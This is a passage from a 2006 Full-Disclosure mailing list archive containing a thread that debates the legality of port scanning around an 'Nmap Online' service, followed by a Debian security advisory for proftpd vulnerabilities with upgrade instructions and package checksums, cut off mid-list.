Matousek a ?crit : > We have set limits to prevent abusing of our service. > common, you're calling to get pwned here... > Yes, one can still scan someone other's network, this is in violation with out Terms of Service. > Ouh, now that's scarry. > We log every attempt and we are ready to provide these logs to authorities. > Ever heard of tor ?? > However, everyone who has Internet access is able to download Nmap > and do similar scan. You can do nothing more with our service. > There is no damage you can cause with our service even if it is abused. > We believe that pros are more than cons here, that people will use our service > to fix their issues on their firewalls and networks What about online metasploit & Core Impact too ? ;D Cheers, endrazine- From dudevanwinkle at gmail.com Fri Dec 1 17:24:56 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 12:24:56 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> Its obvious that anyone who hires Stonehenge Consulting services is > Dude> getting someone who cant read. I never said postscanning was illegal. > Dude> i said it "isnt illegal". > > And I'm disagreeing with this. Why? > Dude> I even provided a link to the case in > Dude> georgia that helped decide this. > > If there's caselaw in Georgia, that's useful for Georgia, but > certainly isn't referencable in the 49 other states. So you can't > generalize that. So, you are disagreeing with Kevin who states: http://www.securityfocus.com/news/126 "The ruling does not affect criminal applications of the anti-hacking law, but federal law enforcement officials are generally in agreement that port scanning is not a crime." Do you know of a case where someone was convicted due to a portscan? I can imagine that a portscan may be used in conjunction with other evidence to build a case for intent, but I have not heard of anyone being busted for an nmap scan. I was going to build the case, but it looks like someone has already done it for me: from:http://www.krcf.org/krcfhome/MINDS_NEWYORK/1MoC3e_d.htm Only one published opinion has considered the legality of port scans. That court held that such activity did not violate federal or state computer protection statues or other law. The federal district court for the Northern District of Georgia held that a party who conducted port scans of another party's computer systems did not violate the Computer Fraud and Abuse Act (18 U.S.C. s. 1030) [1], because he neither caused damaged nor gained access to the computers at issue. Moulton v. VC3, 2000 WL 3331091 at *6 (N.D. Ga., Nov. 7, 2000). Nor did the port scans violate state law, because they did not interfere with computer or network activity. References: [1] The Computer Fraud and Abuse Act: [2] Moulton v. VC3, 2000 WL 3331091 (N.D. Ga., Nov. 7, 2000) [3] Computer Crime and Intellectual Property Section, U.S. Department of Justice, Legislative Analysis of the 1996 National Information Infrastructure Protection Act: [4] Computer Crime and Intellectual Property Section, U.S. Department of Justice, Field Guidance on New Authorities That Relate to Computer Crime and Electronic Evidence Enacted in the USA Patriot Act of 2001 --------------------------- So back to my earlier statement, if you nessus someones machine, that would impact their performance and be illegal, a single nmap scan, not so much. Now I am not saying that some hot-shot lawyer wouldnt be able to convince a judge to imprison someone for an nmap scan but while you may be able to convince a judge that OJ didnt do it, murder is still illegal -JP From dudevanwinkle at gmail.com Fri Dec 1 17:34:09 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 12:34:09 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: > > If there's caselaw in Georgia, that's useful for Georgia, but > certainly isn't referencable in the 49 other states. actually, it is. it is called legal precedence From merlyn at stonehenge.com Fri Dec 1 17:36:58 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 09:36:58 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> Message-ID: <86bqmnsekl.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: >> >> If there's caselaw in Georgia, that's useful for Georgia, but >> certainly isn't referencable in the 49 other states. Dude> actually, it is. it is called legal precedence It wasn't clear from your posting that you were talking about a federal case. In that case, yes, it's caselaw. However, if it was just Georgia state law, that would *not* create case law for any other state. By the way, "caselaw" and "legal precedent" are the same. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From dudevanwinkle at gmail.com Fri Dec 1 16:52:21 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 11:52:21 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com> References: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com> Message-ID: On 12/1/06, Randall M wrote: > > [ > [------------------------------ > [ > [Message: 11 > [Date: Fri, 1 Dec 2006 06:48:38 -0500 > [From: "Dude VanWinkle" > [Subject: Re: [Full-disclosure] Nmap Online > [To: "Mike Huber" > [Cc: full-disclosure at lists.grok.org.uk > [Message-ID: > [ > [Content-Type: text/plain; charset=ISO-8859-1; format=flowed > [ > [On 12/1/06, Mike Huber wrote: > [> first of all, IANAL, but the TOS seem to cover the basics... > [ > [> None-the-less, my 8-ball sees litigation in their future. > [ > [ > [portscanning isnt illegal in the states > [ > [-JP [a lawyer> > [ > [ > > RandallM > > -JP From dudevanwinkle at gmail.com Fri Dec 1 17:45:39 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 12:45:39 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86bqmnsekl.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> <86bqmnsekl.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 09:36:58 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote: > >> > >> If there's caselaw in Georgia, that's useful for Georgia, but > >> certainly isn't referencable in the 49 other states. > > Dude> actually, it is. it is called legal precedence > > It wasn't clear from your posting that you were talking about a federal case. well try reading the material I reference before saying that anyone who listens to me is a fool next time plz. > In that case, yes, it's caselaw. However, if it was just Georgia state law, > that would *not* create case law for any other state. > > By the way, "caselaw" and "legal precedent" are the same. thanks for the info, i learned something new today, which makes it a good day. From michael.holstein at csuohio.edu Fri Dec 1 17:58:51 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 01 Dec 2006 12:58:51 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> Message-ID: <45706D5B.5070409@csuohio.edu> > If it can be argued as an "unauthorized access", it's at least a misdemeanor > in many states, felony in some. And you don't want to be on the wrong end of > that prosecution. "Illegal" and "Unlawful" are both fuzzy terms. Basically it's a matter of which side an convince 12 folks who have nothing better to do than drink stale coffee for $6/day. From jmm at debian.org Fri Dec 1 18:11:17 2006 From: jmm at debian.org (Moritz Muehlenhoff) Date: Fri, 1 Dec 2006 19:11:17 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1222-2] New proftpd packages fix several vulnerabilities Message-ID: <20061201181117.GA3274@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1222-2 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff December 1st, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : proftpd Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5815 CVE-2006-6170 CVE-2006-6171 Debian Bug : 399070 Due to technical problems yesterday's proftpd update lacked a build for the amd64 architecture, which is now available. Several remote vulnerabilities have been discovered in the proftpd FTP daemon, which may lead to the execution of arbitrary code or denial of service. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-5815 It was discovered that a buffer overflow in the sreplace() function may lead to denial of service and possibly the execution of arbitrary code. CVE-2006-6170 It was discovered that a buffer overflow in the mod_tls addon module may lead to the execution of arbitrary code. CVE-2006-6171 It was discovered that insufficient validation of FTP command buffer size limits may lead to denial of service. Due to unclear information this issue was already fixed in DSA-1218 as CVE-2006-5815. For the stable distribution (sarge) these problem has been fixed in version 1.2.10-15sarge3. For the unstable distribution (sid) this problem has been fixed in version 1.3.0-16 of the proftpd-dfsg package. We recommend that you upgrade your proftpd package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3.dsc Size/MD5 checksum: 897 d4dea6caa9438bea9d260f20761393ec http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3.diff.gz Size/MD5 checksum: 128340 4f14cee4723b725983eed3d7d9e7fe39 http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10.orig.tar.gz Size/MD5 checksum: 920495 7d2bc5b4b1eef459a78e55c027a4f3c4 Architecture independent components: http://security.debian.org/pool/updates/main/p/proftpd/proftpd-doc_1.2.10-15sarge3_all.deb Size/MD5 checksum: 422614 c673d2a4e9db616bca66e8c2f992a95d Alpha architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 444532 d4950ecc709597f04a379e4a3f5644f9 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 200874 92481cca4bbbce0f0db4fb16ac0c53af http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 457334 b730aa7d3ff1c08d08bca66168686626 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 476906 15a84985231a886c2d9cfaa108edad31 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_alpha.deb Size/MD5 checksum: 476588 3ae27f992a26986872cfc4e26af3add5 AMD64 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 389136 7bddbc3f2780aa71452dad18e8f1f2aa http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 194638 e1b229291ddf3c0050492c926add1e08 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 400102 2ce57e6d93236508f064b0546d19bf01 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 415450 30b99e2426cf7a3bcfce35dc03b5c39f http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_amd64.deb Size/MD5 checksum: 415232 4a021fe85a08b02051702aafbdfcd893 ARM architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 373966 1c371d644b23ffa23ae4cdb847237048 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 188856 094b34ff2e629e4a2e34a40632130782 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 384130 3a073b4e2ce0a4c006b021bc2a70713c http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 399002 52a258d6db3529dc42f93b3377166f48 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_arm.deb Size/MD5 checksum: 398846 010ff68a50710591d79e6791a36ebe4e HP Precision architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 403768 625a4174453f9aae518fecf9e4f6cffd http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 194534 d69950a0728249287a953efd0e256d95 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 414946 26cd4464a72e49bf3dd7bae1e6bcb4c5 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 431866 880875bdcf2aa45c40af333a205a9386 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_hppa.deb Size/MD5 checksum: 431612 82c75ec629e6408d19f8b7f4e1704e0b Intel IA-32 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 371322 3fa4ccac9c73bc8c19e075ed49f01a42 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 188924 2bdb4609055c6a77ef45e376f43bb6b8 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 381022 5cc5974e4124b09a5c3a7a04fc4c0dfb http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 396780 1e05de59c612c3b59a0384c6b728909c http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_i386.deb Size/MD5 checksum: 396546 e7e49a7c96f3c5f1a335bdce31b4a41d Intel IA-64 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 519752 379b681d8139096f30c07adaf360a258 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 207072 6a7a86411c903cfe92848369d8939dc9 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 535426 f6e1da6b7febf2b374ce3d9cf844596e http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 562386 6b9476b33d3eb98e87cda796ef3e1cba http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_ia64.deb Size/MD5 checksum: 562222 ddaf242f3d24e951b9578f2bf37ae4c7 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 332616 7f28eb7a6612422159554511d20c565c http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 187212 97853824e6e354d30d08e5d4f92f866a http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 340948 7cb0f9de38603efd2becbaf8a767860d http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 353236 b8afaa29deb9a2aaa5826fefd92ee051 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_m68k.deb Size/MD5 checksum: 352866 dddab5e89fc109de3892f100d5ea702d Big endian MIPS architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 382502 88e5ef3fca660e28577a39db65f0743b http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 201698 9a79029722afde2e9f9881323f09f523 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 391960 847c19048ee9c921abbcedb0742be96d http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 406524 d89d533478c0e5f9997869122173e627 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_mips.deb Size/MD5 checksum: 406246 f12661492861e6c6f94f5f2ae57318d4 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 384380 83f0858fa68da448e561f9cfd48fedab http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 201916 8a197d293f4c7d735bd0584ec6ec74ee http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 393456 45fb0f0a6f79be0ebab17ebf7305340f http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 409566 4d33f9e7c059949a27704379228b7119 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_mipsel.deb Size/MD5 checksum: 409366 5ee8e0e4dc1c831a2f56ff92404ea1c8 PowerPC architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 384536 67c443041e0f5fdc280952fe849f6905 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-common_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 195440 cf7b974f9f75e96ff9eb60afd64ceac0 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-ldap_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 395224 3ef2ae27f6234f181b2934f8656d47a0 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-mysql_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 412098 160500875d6d666fe89ff3590767f205 http://security.debian.org/pool/updates/main/p/proftpd/proftpd-pgsql_1.2.10-15sarge3_powerpc.deb Size/MD5 checksum: 411734 baf2f4a518503428bd46c7528adf3ed0 IBM S/390 architecture: http://security.debian.org/pool/updates/main/p/proftpd/proftpd_1.2.10-15sarge3_s390.deb Size/MD5 checksum: 379718 c33ac1f5e3afa178